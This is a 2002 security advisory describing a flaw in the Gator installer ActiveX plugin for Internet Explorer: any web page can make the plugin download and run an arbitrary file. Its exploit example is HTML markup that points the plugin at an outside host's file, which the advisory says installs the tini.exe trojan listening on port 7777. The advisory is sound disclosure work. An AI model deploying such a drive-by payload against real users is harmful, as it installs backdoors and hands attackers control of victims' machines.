Advisory Title: Gator installer Plugin allows any software to be installed Release Date: 21/01/2002 Application: Gator installer plugin for Internet Explorer (GAIN) Platform: Windows clients with Internet Explorer. DLL version - 3.0.6.1 Severity: Malicious users can install backdoor software and gain easy access to the target machine. Author: Obscure^ [ obscure@eyeonsecurity.net ] Vendor Status: Not informed. Web: http://www.gator.com http://eyeonsecurity.net/advisories/gatorieplugin.html Background. (extracted from http://gator.com) Features: Fills in FORMS without typing! Remembers PASSWORDS automatically Protects and encrypts your data on YOUR computer Gator comes bundled .. etc The vulnerabity exists in a plugin which installs the actual software. This plugin is scriptable and an HTML page to specify the location of the Gator installation. This activeX component is usually installed from this page: http://www.gator.com/download/msie.html Problem. The issue here is that any HTML page can specify the location of the Gator installation file. The installation file is downloaded, then it is checked for the filename. If the filename is setup.ex_, it is then decompressed and executed. If the file is not compressed it will still execute it. Of course using this method, a malicious user can easily create an HTML page which makes use of the rogue ActiveX component to point at a trojan file. Exploit Example. <xbject id="IEGator" classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C" codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab"; align="baseline" border="0" width="400" height="20"> <pxram name="params" value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgc olor=F0F1D0&aic=",aicStr,"&"> </xbject> I set up a small demonstation which installs tini.exe (which is a trojan listening on port 7777). If you need any information about tini.exe check out http://www.ntsecurity.nu/toolbox/tini/. The exploit example is found at : http://eyeonsecurity.net/advisories/gatorexploit Fix. Simply delete the ActiveX component from %windir%\Downloaded Program Files .. i think that should fix it. Disclaimer. The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. Feedback. Please send suggestions, updates, and comments to: Eye on Security mail : obscure@eyeonsecurity.net web : http://www.eyeonsecurity.net
